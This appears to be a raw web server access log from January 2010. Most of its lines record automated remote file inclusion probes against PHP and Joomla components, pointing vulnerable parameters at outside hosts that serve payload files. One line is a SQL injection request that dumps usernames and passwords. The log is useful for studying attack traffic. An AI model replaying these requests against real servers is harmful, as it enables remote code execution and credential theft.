200.93.147.154 - - [17/Jan/2010:04:04:12 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:04:12 -0500] "GET /logs/access_log.Q109080600/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:04:12 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:04:30 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:04:30 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:04:30 -0500] "GET /logs/access_log.Q109123000//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:04:31 -0500] "GET /logs/error_log.Q109112200//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:04:33 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:04:33 -0500] "GET /logs/access_log.Q109123000//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:04:33 -0500] "GET /logs/error_log.Q109112200//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:04:34 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:04:40 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:04:42 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:04:42 -0500] "GET /logs/access_log.Q109123000//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
89.111.176.66 - - [17/Jan/2010:04:05:02 -0500] "GET /logs/access_log.Q109071200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.marcus-schleef.de//redaxo/include/a.txt? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.111.176.66 - - [17/Jan/2010:04:05:02 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.marcus-schleef.de//redaxo/include/a.txt? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
87.106.7.77 - - [17/Jan/2010:04:05:08 -0500] "GET /logs/error_log.Q109112200//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jan/2010:04:05:21 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.111.176.66 - - [17/Jan/2010:04:05:46 -0500] "GET /logs/access_log.Q109120900//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.marcus-schleef.de//redaxo/include/a.txt? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
69.16.230.82 - - [17/Jan/2010:04:05:54 -0500] "GET ///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:05:54 -0500] "GET /logs///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:05:54 -0500] "GET /logs/error_log.Q109070300%20%20///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:06:37 -0500] "GET /logs/error_log.Q109080200%20%20///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:06:37 -0500] "GET ///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
89.111.176.66 - - [17/Jan/2010:04:06:39 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.marcus-schleef.de//redaxo/include/a.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
89.111.176.66 - - [17/Jan/2010:04:06:40 -0500] "GET /logs/access_log.Q109081500//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.marcus-schleef.de//redaxo/include/a.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
89.111.176.66 - - [17/Jan/2010:04:06:40 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.marcus-schleef.de//redaxo/include/a.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
89.111.176.66 - - [17/Jan/2010:04:06:40 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.marcus-schleef.de//redaxo/include/a.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
69.16.230.82 - - [17/Jan/2010:04:07:09 -0500] "GET /logs///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:07:09 -0500] "GET /logs/access_log.Q109101500///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.111.176.66 - - [17/Jan/2010:04:07:22 -0500] "GET /logs/error_log.Q109120900//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.marcus-schleef.de//redaxo/include/a.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
87.106.7.77 - - [17/Jan/2010:04:07:23 -0500] "GET /logs/error_log.Q109112200%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:07:23 -0500] "GET /logs/access_log.Q109123000%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:07:24 -0500] "GET /logs/access_log.Q109123000%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:07:25 -0500] "GET /logs/error_log.Q109112200%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:07:25 -0500] "GET /logs///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:07:25 -0500] "GET ///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:07:25 -0500] "GET /logs/access_log.Q109061100%20%20///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:07:28 -0500] "GET /logs/access_log.Q109080600%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:07:33 -0500] "GET ///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:07:33 -0500] "GET /logs/access_log.Q109070300///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:07:33 -0500] "GET /logs///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:07:38 -0500] "GET /logs/access_log.Q109090300///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:07:46 -0500] "GET /logs/access_log.Q109080600%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:07:46 -0500] "GET ///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:07:46 -0500] "GET /logs///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:07:46 -0500] "GET /logs/access_log.Q109090300///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:07:47 -0500] "GET /logs/access_log.Q109123000%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:07:47 -0500] "GET /logs/error_log.Q109112200%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:07:58 -0500] "GET /logs/access_log.Q109091100%20%20///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:08:00 -0500] "GET /logs/access_log.Q109052100///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.68.142 - - [17/Jan/2010:04:08:51 -0500] "GET /images/contact_fax_over.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
212.175.5.130 - - [17/Jan/2010:04:09:30 -0500] "GET //bbs/delete.php?board_skin_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:04:09:31 -0500] "GET //bbs/delete.php?board_skin_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:04:09:39 -0500] "GET /logs/access_log.Q109072200%20%20//bbs/delete.php?board_skin_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:04:09:39 -0500] "GET /logs//bbs/delete.php?board_skin_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:04:09:39 -0500] "GET //bbs/delete.php?board_skin_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:04:09:41 -0500] "GET /logs//bbs/delete.php?board_skin_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:04:09:41 -0500] "GET /logs/access_log.Q109072200//bbs/delete.php?board_skin_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
219.94.198.80 - - [17/Jan/2010:04:09:42 -0500] "GET //bbs/delete.php?board_skin_path=http://www.avto-x.ru//banners/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:04:09:43 -0500] "GET //bbs/delete.php?board_skin_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:04:09:43 -0500] "GET /logs//bbs/delete.php?board_skin_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:04:09:43 -0500] "GET /logs/access_log.Q109072200%20%20//bbs/delete.php?board_skin_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:04:09:45 -0500] "GET /logs//bbs/delete.php?board_skin_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:04:09:45 -0500] "GET /logs/access_log.Q109072200//bbs/delete.php?board_skin_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
219.94.198.80 - - [17/Jan/2010:04:09:50 -0500] "GET /logs/access_log.Q109072200//bbs/delete.php?board_skin_path=http://www.avto-x.ru//banners/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
219.94.198.80 - - [17/Jan/2010:04:09:50 -0500] "GET /logs//bbs/delete.php?board_skin_path=http://www.avto-x.ru//banners/id.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
219.94.198.80 - - [17/Jan/2010:04:10:00 -0500] "GET /logs/access_log.Q109072200%20%20//bbs/delete.php?board_skin_path=http://www.avto-x.ru//banners/id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
219.94.198.80 - - [17/Jan/2010:04:10:01 -0500] "GET /logs//bbs/delete.php?board_skin_path=http://www.avto-x.ru//banners/id.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
219.94.198.80 - - [17/Jan/2010:04:10:01 -0500] "GET //bbs/delete.php?board_skin_path=http://www.avto-x.ru//banners/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jan/2010:04:10:33 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.175.5.130 - - [17/Jan/2010:04:10:55 -0500] "GET /logs/access_log.Q109112100%20%20//bbs/delete.php?board_skin_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:04:10:59 -0500] "GET /logs/access_log.Q109112100%20%20//bbs/delete.php?board_skin_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
203.130.149.241 - - [17/Jan/2010:04:11:08 -0500] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.130.149.241 - - [17/Jan/2010:04:11:08 -0500] "GET /logs/access_log.Q109103100%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
203.130.149.241 - - [17/Jan/2010:04:11:08 -0500] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
89.111.176.66 - - [17/Jan/2010:04:11:17 -0500] "GET ///index.php?option=http://musicadelibreria.net/footer?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
89.111.176.66 - - [17/Jan/2010:04:11:18 -0500] "GET /logs/access_log.Q109051500///index.php?option=http://musicadelibreria.net/footer?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.111.176.66 - - [17/Jan/2010:04:11:18 -0500] "GET /logs///index.php?option=http://musicadelibreria.net/footer?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:04:11:23 -0500] "GET /logs///bbs//delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:04:11:23 -0500] "GET /logs/error_log.Q110010500%20%20///bbs//delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:04:11:23 -0500] "GET ///bbs//delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
89.111.176.66 - - [17/Jan/2010:04:11:23 -0500] "GET /logs/access_log.Q109120800///index.php?option=http://musicadelibreria.net/footer?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:04:11:27 -0500] "GET /logs//bbs/delete.php?board_skin_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:04:11:27 -0500] "GET /logs/access_log.Q109072200//bbs/delete.php?board_skin_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:04:11:27 -0500] "GET //bbs/delete.php?board_skin_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:04:11:30 -0500] "GET /logs//bbs/delete.php?board_skin_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:04:11:30 -0500] "GET //bbs/delete.php?board_skin_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:04:11:30 -0500] "GET /logs/access_log.Q109072200//bbs/delete.php?board_skin_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
219.94.198.80 - - [17/Jan/2010:04:11:35 -0500] "GET /logs/access_log.Q109112100%20%20//bbs/delete.php?board_skin_path=http://www.avto-x.ru//banners/id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
66.249.68.41 - - [17/Jan/2010:04:11:41 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L014C325B124298001F9C07M+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.16.230.82 - - [17/Jan/2010:04:12:23 -0500] "GET ///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:12:23 -0500] "GET /logs/access_log.Q109092100%20%20///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:12:23 -0500] "GET /logs///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:12:30 -0500] "GET /logs/access_log.Q109081800%20%20///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:04:12:32 -0500] "GET /logs/access_log.Q109112100//bbs/delete.php?board_skin_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:04:12:36 -0500] "GET /logs/access_log.Q109112100//bbs/delete.php?board_skin_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
38.102.74.19 - - [17/Jan/2010:04:12:40 -0500] "GET /logs//delete_all.php?board_skin_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 218 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
38.102.74.19 - - [17/Jan/2010:04:12:40 -0500] "GET //delete_all.php?board_skin_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 213 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
67.195.37.174 - - [17/Jan/2010:04:12:01 -0500] "GET /logs/error_log.Q109102600 HTTP/1.0" 200 3923534 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.10.132.67 - - [17/Jan/2010:04:13:02 -0500] "GET /logs/access_log.Q109110100%20%20/?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:04:13:02 -0500] "GET /?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:04:13:02 -0500] "GET /logs/?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 34516 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:04:13:07 -0500] "GET /logs/access_log.Q109112100%20%20/?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:13:52 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:13:52 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:13:52 -0500] "GET /logs/access_log.Q109062900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:13:52 -0500] "GET /logs/access_log.Q109061300%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:13:52 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:13:52 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:13:52 -0500] "GET /logs/access_log.Q109062900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:13:53 -0500] "GET /logs/access_log.Q109061300%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:04:14:08 -0500] "GET //?_zb_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:04:14:08 -0500] "GET /logs//?_zb_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 200 34521 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:04:14:13 -0500] "GET /logs/access_log.Q109110100%20%20/?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:04:14:18 -0500] "GET /?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:04:14:18 -0500] "GET /logs/?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 34516 "-" "Mozilla/5.0"
69.10.132.67 - - [17/Jan/2010:04:14:22 -0500] "GET /logs/access_log.Q109112100%20%20/?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
38.99.70.210 - - [17/Jan/2010:04:14:29 -0500] "GET /index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*' HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
86.109.170.73 - - [17/Jan/2010:04:14:32 -0500] "GET /logs/access_log.Q109093000//?_zb_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
38.102.74.19 - - [17/Jan/2010:04:15:02 -0500] "GET //delete_all.php?board_skin_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 213 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
38.102.74.19 - - [17/Jan/2010:04:15:03 -0500] "GET /logs//delete_all.php?board_skin_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 218 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
212.193.248.181 - - [17/Jan/2010:04:15:07 -0500] "GET /logs/access_log.Q109111400///write.php?setup[use_category]=1&dir=http://83.143.148.154:32000/accounts/inc/.vsh/idgog.txt? HTTP/1.1" 404 236 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
212.193.248.181 - - [17/Jan/2010:04:15:07 -0500] "GET ///write.php?setup[use_category]=1&dir=http://83.143.148.154:32000/accounts/inc/.vsh/idgog.txt? HTTP/1.1" 404 209 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
